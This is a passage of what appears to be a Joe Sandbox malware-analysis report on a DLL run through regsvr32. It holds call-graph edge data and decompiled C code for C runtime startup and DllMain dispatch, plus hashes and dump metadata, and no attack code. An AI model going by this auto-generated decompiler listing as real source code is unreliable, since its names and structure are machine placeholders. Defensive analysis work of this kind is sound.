9982->9944 9997 6f84ce69 9983->9997 9987 6f84c820 9986->9987 9988 6f84c80f 9986->9988 10021 6f84c6c7 9987->10021 10014 6f84c8a7 GetModuleHandleW 9988->10014 9993 6f84c85a 9993->9942 9998 6f84ce75 CallCatchBlock 9997->9998 10005 6f84e955 EnterCriticalSection 9998->10005 10000 6f84ce83 10006 6f84d067 10000->10006 10005->10000 10007 6f84d086 10006->10007 10008 6f84ce90 10006->10008 10007->10008 10009 6f84dc0e _free 14 API calls 10007->10009 10010 6f84ceb8 10008->10010 10009->10008 10013 6f84e99d LeaveCriticalSection 10010->10013 10012 6f848f6f 10012->9942 10013->10012 10015 6f84c814 10014->10015 10015->9987 10016 6f84c8ea GetModuleHandleExW 10015->10016 10017 6f84c909 GetProcAddress 10016->10017 10020 6f84c91e 10016->10020 10017->10020 10018 6f84c932 FreeLibrary 10019 6f84c93b 10018->10019 10019->9987 10020->10018 10020->10019 10022 6f84c6d3 CallCatchBlock 10021->10022 10037 6f84e955 EnterCriticalSection 10022->10037 10024 6f84c6dd 10038 6f84c714 10024->10038 10026 6f84c6ea 10042 6f84c708 10026->10042 
10029 6f84c865 10046 6f84e9b4 GetPEB 10029->10046 10032 6f84c894 10035 6f84c8ea CallUnexpected 3 API calls 10032->10035 10033 6f84c874 GetPEB 10033->10032 10034 6f84c884 GetCurrentProcess TerminateProcess 10033->10034 10034->10032 10036 6f84c89c ExitProcess 10035->10036 10037->10024 10039 6f84c720 CallCatchBlock 10038->10039 10040 6f84d157 __DllMainCRTStartup@12 14 API calls 10039->10040 10041 6f84c781 CallUnexpected 10039->10041 10040->10041 10041->10026 10045 6f84e99d LeaveCriticalSection 10042->10045 10044 6f84c6f6 10044->9993 10044->10029 10045->10044 10047 6f84c86f 10046->10047 10048 6f84e9ce 10046->10048 10047->10032 10047->10033 10050 6f84de3d 10048->10050 10053 6f84ddba 10050->10053 10054 6f84dde8 10053->10054 10058 6f84dde4 10053->10058 10054->10058 10060 6f84dcf3 10054->10060 10057 6f84de02 GetProcAddress 10057->10058 10059 6f84de12 __dosmaperr 10057->10059 10058->10047 10059->10058 10065 6f84dd04 ___vcrt_FlsFree 10060->10065 10061 6f84ddaf 10061->10057 10061->10058 10062 6f84dd22 LoadLibraryExW 10063 6f84dd3d GetLastError 10062->10063 10062->10065 10063->10065 10064 6f84dd98 FreeLibrary 10064->10065 10065->10061 10065->10062 10065->10064 10066 6f84dd70 LoadLibraryExW 10065->10066 10066->10065 10068 6f84ad21 10067->10068 10069 6f849a5c 10067->10069 10068->10069 10070 6f84c2b0 ___std_type_info_destroy_list 14 API calls 10068->10070 10069->9946 10070->10068 10072 6f84d320 ___scrt_uninitialize_crt 10071->10072 10073 6f84d30e 10071->10073 10072->9974 10074 6f84d31c 10073->10074 10082 6f84e40a 10073->10082 10074->9974 10077 6f84a976 10076->10077 10078 6f84a96c 10076->10078 10077->9972 10148 6f84ae59 10078->10148 10085 6f84e2b8 10082->10085 10088 6f84e20c 10085->10088 10089 6f84e218 CallCatchBlock 10088->10089 10096 6f84e955 EnterCriticalSection 10089->10096 10091 6f84e28e 10105 6f84e2ac 10091->10105 10093 6f84e222 ___scrt_uninitialize_crt 10093->10091 10097 6f84e180 10093->10097 10096->10093 10098 6f84e18c CallCatchBlock 10097->10098 10108 6f84c3df 
EnterCriticalSection 10098->10108 10100 6f84e196 ___scrt_uninitialize_crt 10104 6f84e1cf 10100->10104 10109 6f84e3c2 10100->10109 10119 6f84e200 10104->10119 10147 6f84e99d LeaveCriticalSection 10105->10147 10107 6f84e29a 10107->10074 10108->10100 10110 6f84e3cf 10109->10110 10111 6f84e3d8 10109->10111 10112 6f84e2b8 ___scrt_uninitialize_crt 66 API calls 10110->10112 10122 6f84e35d 10111->10122 10118 6f84e3d5 10112->10118 10116 6f84e3f4 10135 6f8508a4 10116->10135 10118->10104 10146 6f84c3f3 LeaveCriticalSection 10119->10146 10121 6f84e1ee 10121->10093 10123 6f84e375 10122->10123 10124 6f84e39a 10122->10124 10123->10124 10125 6f84e84d ___scrt_uninitialize_crt 25 API calls 10123->10125 10124->10118 10128 6f84e84d 10124->10128 10126 6f84e393 10125->10126 10127 6f85109c ___scrt_uninitialize_crt 62 API calls 10126->10127 10127->10124 10129 6f84e86e 10128->10129 10130 6f84e859 10128->10130 10129->10116 10131 6f84d46d _free 14 API calls 10130->10131 10132 6f84e85e 10131->10132 10133 6f84c24f ___std_exception_copy 25 API calls 10132->10133 10134 6f84e869 10133->10134 10134->10116 10136 6f8508b5 10135->10136 10137 6f8508c2 10135->10137 10138 6f84d46d _free 14 API calls 10136->10138 10139 6f85090b 10137->10139 10141 6f8508e9 10137->10141 10143 6f8508ba 10138->10143 10140 6f84d46d _free 14 API calls 10139->10140 10142 6f850910 10140->10142 10144 6f850802 ___scrt_uninitialize_crt 29 API calls 10141->10144 10145 6f84c24f ___std_exception_copy 25 API calls 10142->10145 10143->10118 10144->10143 10145->10143 10146->10121 10147->10107 10149 6f84a971 10148->10149 10150 6f84ae63 10148->10150 10152 6f84bc68 10149->10152 10156 6f84bf25 10150->10156 10153 6f84bc92 10152->10153 10154 6f84bc73 10152->10154 10153->10077 10155 6f84bc7d DeleteCriticalSection 10154->10155 10155->10153 10155->10155 10161 6f84bea1 10156->10161 10159 6f84bf57 TlsFree 10160 6f84bf4b 10159->10160 10160->10149 10162 6f84beb9 10161->10162 10166 6f84bedc 10161->10166 10162->10166 10167 6f84be07 10162->10167 10165 
6f84bece GetProcAddress 10165->10166 10166->10159 10166->10160 10172 6f84be13 ___vcrt_FlsFree 10167->10172 10168 6f84be87 10168->10165 10168->10166 10169 6f84be29 LoadLibraryExW 10170 6f84be47 GetLastError 10169->10170 10171 6f84be8e 10169->10171 10170->10172 10171->10168 10173 6f84be96 FreeLibrary 10171->10173 10172->10168 10172->10169 10174 6f84be69 LoadLibraryExW 10172->10174 10173->10168 10174->10171 10174->10172 10180 6f84d333 10175->10180 10178 6f84ae59 ___vcrt_uninitialize_ptd 6 API calls 10179 6f8494a4 10178->10179 10179->9936 10183 6f84dbf4 10180->10183 10184 6f84dbfe 10183->10184 10185 6f848f86 10183->10185 10187 6f84dedb 10184->10187 10185->10178 10188 6f84ddba __dosmaperr 5 API calls 10187->10188 10189 6f84def7 10188->10189 10190 6f84df00 10189->10190 10191 6f84df12 TlsFree 10189->10191 10190->10185 10192->9934 11951 6f84e8ed 11954 6f84e874 11951->11954 11955 6f84e880 CallCatchBlock 11954->11955 11962 6f84e955 EnterCriticalSection 11955->11962 11957 6f84e88a 11958 6f84e8b8 11957->11958 11961 6f850634 __fassign 14 API calls 11957->11961 11963 6f84e8d6 11958->11963 11961->11957 11962->11957 11966 6f84e99d LeaveCriticalSection 11963->11966 11965 6f84e8c4 11966->11965 10657 6f84cc7d 10668 6f84f8d2 10657->10668 10662 6f84cc9a 10665 6f84dc0e _free 14 API calls 10662->10665 10666 6f84ccc9 10665->10666 10667 6f84dc0e _free 14 API calls 10667->10662 10669 6f84f8db 10668->10669 10673 6f84cc8f 10668->10673 10703 6f84da79 10669->10703 10674 6f84fd93 GetEnvironmentStringsW 10673->10674 10675 6f84fe00 10674->10675 10676 6f84fdaa 10674->10676 10677 6f84cc94 10675->10677 10678 6f84fe09 FreeEnvironmentStringsW 10675->10678 10679 6f84fca5 ___scrt_uninitialize_crt WideCharToMultiByte 10676->10679 10677->10662 10686 6f84cccf 10677->10686 10678->10677 10680 6f84fdc3 10679->10680 10680->10675 10681 6f84e649 15 API calls 10680->10681 10682 6f84fdd3 10681->10682 10683 6f84fdeb 10682->10683 10684 6f84fca5 ___scrt_uninitialize_crt WideCharToMultiByte 10682->10684 10685 6f84dc0e 
_free 14 API calls 10683->10685 10684->10683 10685->10675 10687 6f84cce4 10686->10687 10688 6f84dc48 __dosmaperr 14 API calls 10687->10688 10699 6f84cd0b 10688->10699 10689 6f84cd70 10690 6f84dc0e _free 14 API calls 10689->10690 10691 6f84cca5 10690->10691 10691->10667 10692 6f84dc48 __dosmaperr 14 API calls 10692->10699 10693 6f84cd72 11039 6f84cd9f 10693->11039 10695 6f84d4ed ___std_exception_copy 25 API calls 10695->10699 10697 6f84dc0e _free 14 API calls 10697->10689 10698 6f84cd92 10700 6f84c27c ___std_exception_copy 11 API calls 10698->10700 10699->10689 10699->10692 10699->10693 10699->10695 10699->10698 10701 6f84dc0e _free 14 API calls 10699->10701 10702 6f84cd9e 10700->10702 10701->10699 10704 6f84da84 10703->10704 10705 6f84da8a 10703->10705 10706 6f84df1a __dosmaperr 6 API calls 10704->10706 10707 6f84df59 __dosmaperr 6 API calls 10705->10707 10713 6f84da90 10705->10713 10706->10705 10708 6f84daa4 10707->10708 10709 6f84dc48 __dosmaperr 14 API calls 10708->10709 10708->10713 10711 6f84dab4 10709->10711 10714 6f84dad1 10711->10714 10715 6f84dabc 10711->10715 10716 6f84db09 10713->10716 10747 6f84d547 10713->10747 10718 6f84df59 __dosmaperr 6 API calls 10714->10718 10717 6f84df59 __dosmaperr 6 API calls 10715->10717 10728 6f84f71e 10716->10728 10719 6f84dac8 10717->10719 10720 6f84dadd 10718->10720 10723 6f84dc0e _free 14 API calls 10719->10723 10721 6f84daf0 10720->10721 10722 6f84dae1 10720->10722 10725 6f84d7be __dosmaperr 14 API calls 10721->10725 10724 6f84df59 __dosmaperr 6 API calls 10722->10724 10723->10713 10724->10719 10726 6f84dafb 10725->10726 10727 6f84dc0e _free 14 API calls 10726->10727 10727->10713 10836 6f84f832 10728->10836 10733 6f84f74a 10733->10673 10734 6f84e649 15 API calls 10735 6f84f75b 10734->10735 10746 6f84f78d 10735->10746 10854 6f84f92d 10735->10854 10738 6f84dc0e _free 14 API calls 10741 6f84f79b 10738->10741 10739 6f84f7a3 10743 6f84f7cf 10739->10743 10744 6f84dc0e _free 14 API calls 10739->10744 10740 6f84f788 10742 
6f84d46d _free 14 API calls 10740->10742 10741->10673 10742->10746 10743->10746 10865 6f84f3ba 10743->10865 10744->10743 10746->10738 10758 6f84ff99 10747->10758 10750 6f84d557 10752 6f84d561 IsProcessorFeaturePresent 10750->10752 10757 6f84d580 10750->10757 10754 6f84d56d 10752->10754 10756 6f84c0a3 CallUnexpected 8 API calls 10754->10756 10756->10757 10788 6f84c95b 10757->10788 10791 6f84fecb 10758->10791 10761 6f84ffde 10762 6f84ffea CallCatchBlock 10761->10762 10763 6f84db13 __dosmaperr 14 API calls 10762->10763 10766 6f850017 CallUnexpected 10762->10766 10769 6f850011 CallUnexpected 10762->10769 10763->10769 10764 6f85005e 10765 6f84d46d _free 14 API calls 10764->10765 10767 6f850063 10765->10767 10768 6f85008a 10766->10768 10802 6f84e955 EnterCriticalSection 10766->10802 10770 6f84c24f ___std_exception_copy 25 API calls 10767->10770 10774 6f8501bd 10768->10774 10775 6f8500cc 10768->10775 10785 6f8500fb 10768->10785 10769->10764 10769->10766 10772 6f850048 10769->10772 10770->10772 10772->10750 10777 6f8501c8 10774->10777 10834 6f84e99d LeaveCriticalSection 10774->10834 10775->10785 10803 6f84d9bc GetLastError 10775->10803 10779 6f84c95b CallUnexpected 23 API calls 10777->10779 10780 6f8501d0 10779->10780 10782 6f84d9bc _unexpected 37 API calls 10786 6f850150 10782->10786 10784 6f84d9bc _unexpected 37 API calls 10784->10785 10830 6f85016a 10785->10830 10786->10772 10787 6f84d9bc _unexpected 37 API calls 10786->10787 10787->10772 10789 6f84c801 CallUnexpected 23 API calls 10788->10789 10790 6f84c96c 10789->10790 10792 6f84fed7 CallCatchBlock 10791->10792 10797 6f84e955 EnterCriticalSection 10792->10797 10794 6f84fee5 10798 6f84ff23 10794->10798 10797->10794 10801 6f84e99d LeaveCriticalSection 10798->10801 10800 6f84d54c 10800->10750 10800->10761 10801->10800 10802->10768 10804 6f84d9d3 10803->10804 10805 6f84d9d9 10803->10805 10806 6f84df1a __dosmaperr 6 API calls 10804->10806 10807 6f84df59 __dosmaperr 6 API calls 10805->10807 10827 6f84d9df SetLastError 
10805->10827 10806->10805 10808 6f84d9f7 10807->10808 10809 6f84dc48 __dosmaperr 14 API calls 10808->10809 10808->10827 10811 6f84da07 10809->10811 10812 6f84da26 10811->10812 10813 6f84da0f 10811->10813 10818 6f84df59 __dosmaperr 6 API calls 10812->10818 10816 6f84df59 __dosmaperr 6 API calls 10813->10816 10814 6f84da73 10817 6f84d547 CallUnexpected 35 API calls 10814->10817 10815 6f84da6d 10815->10784 10819 6f84da1d 10816->10819 10820 6f84da78 10817->10820 10821 6f84da32 10818->10821 10824 6f84dc0e _free 14 API calls 10819->10824 10822 6f84da36 10821->10822 10823 6f84da47 10821->10823 10825 6f84df59 __dosmaperr 6 API calls 10822->10825 10826 6f84d7be __dosmaperr 14 API calls 10823->10826 10824->10827 10825->10819 10828 6f84da52 10826->10828 10827->10814 10827->10815 10829 6f84dc0e _free 14 API calls 10828->10829 10829->10827 10831 6f850170 10830->10831 10832 6f850141 10830->10832 10835 6f84e99d LeaveCriticalSection 10831->10835 10832->10772 10832->10782 10832->10786 10834->10777 10835->10832 10837 6f84f83e CallCatchBlock 10836->10837 10838 6f84f858 10837->10838 10873 6f84e955 EnterCriticalSection 10837->10873 10840 6f84f731 10838->10840 10843 6f84d547 CallUnexpected 37 API calls 10838->10843 10847 6f84f4c8 10840->10847 10841 6f84f894 10874 6f84f8b1 10841->10874 10844 6f84f8d1 10843->10844 10845 6f84f868 10845->10841 10846 6f84dc0e _free 14 API calls 10845->10846 10846->10841 10878 6f84c407 10847->10878 10850 6f84f4e9 GetOEMCP 10853 6f84f512 10850->10853 10851 6f84f4fb 10852 6f84f500 GetACP 10851->10852 10851->10853 10852->10853 10853->10733 10853->10734 10855 6f84f4c8 39 API calls 10854->10855 10856 6f84f94d 10855->10856 10858 6f84f987 IsValidCodePage 10856->10858 10862 6f84f9c3 CallUnexpected 10856->10862 10860 6f84f999 10858->10860 10858->10862 10859 6f84f780 10859->10739 10859->10740 10861 6f84f9c8 GetCPInfo 10860->10861 10864 6f84f9a2 CallUnexpected 10860->10864 10861->10862 10861->10864 10932 6f849adf 10862->10932 10921 6f84f59e 10864->10921 10866 6f84f3c6 
CallCatchBlock 10865->10866 11013 6f84e955 EnterCriticalSection 10866->11013 10868 6f84f3d0 11014 6f84f407 10868->11014 10873->10845 10877 6f84e99d LeaveCriticalSection 10874->10877 10876 6f84f8b8 10876->10838 10877->10876 10879 6f84c427 10878->10879 10880 6f84c41e 10878->10880 10879->10880 10881 6f84d9bc _unexpected 37 API calls 10879->10881 10880->10850 10880->10851 10882 6f84c447 10881->10882 10886 6f84e7f3 10882->10886 10887 6f84e806 10886->10887 10888 6f84c45d 10886->10888 10887->10888 10894 6f8505b3 10887->10894 10890 6f84e820 10888->10890 10891 6f84e833 10890->10891 10893 6f84e848 10890->10893 10891->10893 10916 6f84f91a 10891->10916 10893->10880 10895 6f8505bf CallCatchBlock 10894->10895 10896 6f84d9bc _unexpected 37 API calls 10895->10896 10897 6f8505c8 10896->10897 10904 6f85060e 10897->10904 10907 6f84e955 EnterCriticalSection 10897->10907 10899 6f8505e6 10908 6f850634 10899->10908 10904->10888 10905 6f84d547 CallUnexpected 37 API calls 10906 6f850633 10905->10906 10907->10899 10909 6f8505f7 10908->10909 10910 6f850642 __fassign 10908->10910 10912 6f850613 10909->10912 10910->10909 10911 6f850367 __fassign 14 API calls 10910->10911 10911->10909 10915 6f84e99d LeaveCriticalSection 10912->10915 10914 6f85060a 10914->10904 10914->10905 10915->10914 10917 6f84d9bc _unexpected 37 API calls 10916->10917 10918 6f84f924 10917->10918 10919 6f84f832 __fassign 37 API calls 10918->10919 10920 6f84f92a 10919->10920 10920->10893 10922 6f84f5c6 GetCPInfo 10921->10922 10923 6f84f68f 10921->10923 10922->10923 10928 6f84f5de 10922->10928 10924 6f849adf _ValidateLocalCookies 5 API calls 10923->10924 10926 6f84f71c 10924->10926 10926->10862 10939 6f851a90 10928->10939 10931 6f85243e 41 API calls 10931->10923 10933 6f849ae7 10932->10933 10934 6f849ae8 IsProcessorFeaturePresent 10932->10934 10933->10859 10936 6f849b2a 10934->10936 11012 6f849aed SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10936->11012 10938 6f849c0d 10938->10859 
10940 6f84c407 __fassign 37 API calls 10939->10940 10941 6f851ab0 10940->10941 10959 6f84fc29 10941->10959 10943 6f851b6e 10944 6f849adf _ValidateLocalCookies 5 API calls 10943->10944 10947 6f84f646 10944->10947 10945 6f851add 10945->10943 10946 6f84e649 15 API calls 10945->10946 10950 6f851b03 CallUnexpected 10945->10950 10946->10950 10954 6f85243e 10947->10954 10948 6f851b68 10962 6f851b93 10948->10962 10950->10948 10951 6f84fc29 __fassign MultiByteToWideChar 10950->10951 10952 6f851b51 10951->10952 10952->10948 10953 6f851b58 GetStringTypeW 10952->10953 10953->10948 10955 6f84c407 __fassign 37 API calls 10954->10955 10956 6f852451 10955->10956 10966 6f852254 10956->10966 10960 6f84fc3a MultiByteToWideChar 10959->10960 10960->10945 10963 6f851b9f 10962->10963 10965 6f851bb0 10962->10965 10964 6f84dc0e _free 14 API calls 10963->10964 10963->10965 10964->10965 10965->10943 10967 6f85226f 10966->10967 10968 6f84fc29 __fassign MultiByteToWideChar 10967->10968 10971 6f8522b3 10968->10971 10969 6f852418 10970 6f849adf _ValidateLocalCookies 5 API calls 10969->10970 10972 6f84f667 10970->10972 10971->10969 10973 6f84e649 15 API calls 10971->10973 10977 6f8522d8 10971->10977 10972->10931 10973->10977 10974 6f84fc29 __fassign MultiByteToWideChar 10975 6f85231e 10974->10975 10988 6f85237d 10975->10988 10994 6f84dfe6 10975->10994 10976 6f851b93 __freea 14 API calls 10976->10969 10977->10974 10977->10988 10980 6f852354 10983 6f84dfe6 6 API calls 10980->10983 10980->10988 10981 6f85238c 10982 6f84e649 15 API calls 10981->10982 10986 6f85239e 10981->10986 10982->10986 10983->10988 10984 6f852409 10985 6f851b93 __freea 14 API calls 10984->10985 10985->10988 10986->10984 10987 6f84dfe6 6 API calls 10986->10987 10989 6f8523e6 10987->10989 10988->10976 10989->10984 11000 6f84fca5 10989->11000 10991 6f852400 10991->10984 10992 6f852435 10991->10992 10993 6f851b93 __freea 14 API calls 10992->10993 10993->10988 11003 6f84dcbf 10994->11003 10998 6f84e037 LCMapStringW 10999 6f84dff7 
10998->10999 10999->10980 10999->10981 10999->10988 11002 6f84fcbc WideCharToMultiByte 11000->11002 11002->10991 11004 6f84ddba __dosmaperr 5 API calls 11003->11004 11005 6f84dcd5 11004->11005 11005->10999 11006 6f84e043 11005->11006 11009 6f84dcd9 11006->11009 11008 6f84e04e 11008->10998 11010 6f84ddba __dosmaperr 5 API calls 11009->11010 11011 6f84dcef 11010->11011 11011->11008 11012->10938 11013->10868 11024 6f84fb20 11014->11024 11016 6f84f429 11017 6f84fb20 25 API calls 11016->11017 11018 6f84f448 11017->11018 11019 6f84f3dd 11018->11019 11020 6f84dc0e _free 14 API calls 11018->11020 11021 6f84f3fb 11019->11021 11020->11019 11038 6f84e99d LeaveCriticalSection 11021->11038 11023 6f84f3e9 11023->10746 11025 6f84fb31 11024->11025 11026 6f84fb2d __InternalCxxFrameHandler 11024->11026 11027 6f84fb38 11025->11027 11031 6f84fb4b CallUnexpected 11025->11031 11026->11016 11028 6f84d46d _free 14 API calls 11027->11028 11029 6f84fb3d 11028->11029 11030 6f84c24f ___std_exception_copy 25 API calls 11029->11030 11030->11026 11031->11026 11032 6f84fb82 11031->11032 11033 6f84fb79 11031->11033 11032->11026 11035 6f84d46d _free 14 API calls 11032->11035 11034 6f84d46d _free 14 API calls 11033->11034 11036 6f84fb7e 11034->11036 11035->11036 11037 6f84c24f ___std_exception_copy 25 API calls 11036->11037 11037->11026 11038->11023 11040 6f84cdac 11039->11040 11041 6f84cd78 11039->11041 11042 6f84cdc3 11040->11042 11043 6f84dc0e _free 14 API calls 11040->11043 11041->10697 11044 6f84dc0e _free 14 API calls 11042->11044 11043->11040 11044->11041

    Control-flow Graph

    C-Code - Quality: 82%
    			E6F8493FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t34;
    				signed int _t40;
    				signed int _t41;
    				signed int _t42;
    				signed int _t45;
    				signed char _t54;
    				signed int _t56;
    				signed int _t58;
    				void* _t61;
    				void* _t68;
    				signed int _t72;
    				signed int _t76;
    				signed int _t80;
    				void* _t82;
    
    				_t68 = __edx;
    				_push(0x10);
    				_push(0x6f85a5f0);
    				E6F849960(__ebx, __edi, __esi);
    				_t34 =  *0x6f85cfec; // 0x1
    				if(_t34 > 0) {
    					 *0x6f85cfec = _t34 - 1;
    					 *(_t82 - 0x1c) = 1;
    					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    					 *((char*)(_t82 - 0x20)) = E6F848E91();
    					 *(_t82 - 4) = 1;
    					__eflags =  *0x6f85cfc8 - 2;
    					if( *0x6f85cfc8 != 2) {
    						E6F849839(_t68, 1, __esi, 7);
    						asm("int3");
    						_push(0xc);
    						_push(0x6f85a618);
    						E6F849960(__ebx, 1, __esi);
    						_t72 =  *(_t82 + 0xc);
    						__eflags = _t72;
    						if(_t72 != 0) {
    							L9:
    							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    							__eflags = _t72 - 1;
    							if(_t72 == 1) {
    								L12:
    								_t58 =  *(_t82 + 0x10);
    								_t76 = E6F8495B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
    								 *(_t82 - 0x1c) = _t76;
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_t41 = E6F8492A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
    									_t76 = _t41;
    									 *(_t82 - 0x1c) = _t76;
    									__eflags = _t76;
    									if(_t76 != 0) {
    										goto L14;
    									}
    								}
    							} else {
    								__eflags = _t72 - 2;
    								if(_t72 == 2) {
    									goto L12;
    								} else {
    									_t58 =  *(_t82 + 0x10);
    									L14:
    									_push(_t58);
    									_push(_t72);
    									_push( *((intOrPtr*)(_t82 + 8)));
    									_t42 = E6F849A40();
    									_t76 = _t42;
    									 *(_t82 - 0x1c) = _t76;
    									__eflags = _t72 - 1;
    									if(_t72 == 1) {
    										__eflags = _t76;
    										if(_t76 == 0) {
    											_push(_t58);
    											_push(_t42);
    											_push( *((intOrPtr*)(_t82 + 8)));
    											_t45 = E6F849A40();
    											__eflags = _t58;
    											_t25 = _t58 != 0;
    											__eflags = _t25;
    											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
    											E6F8493FD(_t58, _t68, _t72, _t76, _t25);
    											_pop(_t61);
    											E6F8495B8( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
    										}
    									}
    									__eflags = _t72;
    									if(_t72 == 0) {
    										L19:
    										_t76 = E6F8492A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
    										 *(_t82 - 0x1c) = _t76;
    										__eflags = _t76;
    										if(_t76 != 0) {
    											_t76 = E6F8495B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
    											 *(_t82 - 0x1c) = _t76;
    										}
    									} else {
    										__eflags = _t72 - 3;
    										if(_t72 == 3) {
    											goto L19;
    										}
    									}
    								}
    							}
    							 *(_t82 - 4) = 0xfffffffe;
    							_t40 = _t76;
    						} else {
    							__eflags =  *0x6f85cfec - _t72; // 0x1
    							if(__eflags > 0) {
    								goto L9;
    							} else {
    								_t40 = 0;
    							}
    						}
    						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
    						return _t40;
    					} else {
    						E6F848F5C(__ebx, _t61, 1, __esi);
    						E6F849A52();
    						E6F849AB3();
    						 *0x6f85cfc8 =  *0x6f85cfc8 & 0x00000000;
    						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    						E6F849492();
    						_t54 = E6F8490FE( *((intOrPtr*)(_t82 + 8)), 0);
    						asm("sbb esi, esi");
    						_t80 =  ~(_t54 & 0x000000ff) & 1;
    						__eflags = _t80;
    						 *(_t82 - 0x1c) = _t80;
    						 *(_t82 - 4) = 0xfffffffe;
    						E6F84949F();
    						_t56 = _t80;
    						goto L4;
    					}
    				} else {
    					_t56 = 0;
    					L4:
    					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
    					return _t56;
    				}
    			}

    APIs
    • __RTC_Initialize.LIBCMT ref: 6F849444
    • ___scrt_uninitialize_crt.LIBCMT ref: 6F84945E
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: Initialize___scrt_uninitialize_crt
    • String ID:
    • API String ID: 2442719207-0
    • Opcode ID: 288f29c99419db7fbfdcfa619ccdc0ef732179540f988c53b456ad9c1aabaa84
    • Instruction ID: 12cbda8412b272cee9fd847af57efc965815bb6cc64a5d84e79ae71909de2c87
    • Opcode Fuzzy Hash: 288f29c99419db7fbfdcfa619ccdc0ef732179540f988c53b456ad9c1aabaa84
    • Instruction Fuzzy Hash: A641B172D0471CBBDB308F69CE40B9E7A78EB45768F1149DAE8246F288D7749D01CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 83%
    			E6F8494AD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t24;
    				signed int _t25;
    				signed int _t26;
    				signed int _t29;
    				signed int _t35;
    				void* _t37;
    				void* _t40;
    				signed int _t42;
    				signed int _t45;
    				void* _t47;
    				void* _t52;
    
    				_t40 = __edx;
    				_push(0xc);
    				_push(0x6f85a618);
    				E6F849960(__ebx, __edi, __esi);
    				_t42 =  *(_t47 + 0xc);
    				if(_t42 != 0) {
    					L3:
    					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
    					__eflags = _t42 - 1;
    					if(_t42 == 1) {
    						L6:
    						_t35 =  *(_t47 + 0x10);
    						_t45 = E6F8495B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
    						 *(_t47 - 0x1c) = _t45;
    						__eflags = _t45;
    						if(_t45 == 0) {
    							L16:
    							 *(_t47 - 4) = 0xfffffffe;
    							_t24 = _t45;
    							L17:
    							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
    							return _t24;
    						}
    						_t25 = E6F8492A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
    						_t45 = _t25;
    						 *(_t47 - 0x1c) = _t45;
    						__eflags = _t45;
    						if(_t45 == 0) {
    							goto L16;
    						}
    						L8:
    						_push(_t35);
    						_push(_t42);
    						_push( *((intOrPtr*)(_t47 + 8)));
    						_t26 = E6F849A40();
    						_t45 = _t26;
    						 *(_t47 - 0x1c) = _t45;
    						__eflags = _t42 - 1;
    						if(_t42 == 1) {
    							__eflags = _t45;
    							if(_t45 == 0) {
    								_push(_t35);
    								_push(_t26);
    								_push( *((intOrPtr*)(_t47 + 8)));
    								_t29 = E6F849A40();
    								__eflags = _t35;
    								_t14 = _t35 != 0;
    								__eflags = _t14;
    								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
    								E6F8493FD(_t35, _t40, _t42, _t45, _t14);
    								_pop(_t37);
    								E6F8495B8( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
    							}
    						}
    						__eflags = _t42;
    						if(_t42 == 0) {
    							L13:
    							_t45 = E6F8492A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
    							 *(_t47 - 0x1c) = _t45;
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t45 = E6F8495B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
    								 *(_t47 - 0x1c) = _t45;
    							}
    							goto L16;
    						} else {
    							__eflags = _t42 - 3;
    							if(_t42 != 3) {
    								goto L16;
    							}
    							goto L13;
    						}
    					}
    					__eflags = _t42 - 2;
    					if(_t42 == 2) {
    						goto L6;
    					}
    					_t35 =  *(_t47 + 0x10);
    					goto L8;
    				}
    				_t52 =  *0x6f85cfec - _t42; // 0x1
    				if(_t52 > 0) {
    					goto L3;
    				}
    				_t24 = 0;
    				goto L17;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: 5fe9c07127f5f08f9aeaca650adedbe1d1914745b37b83f29c844dccc8af9e35
    • Instruction ID: bc0f1c8479736eb067a985d7b15f5a0c24a0bdcc29ea8554c4ee24b61f753542
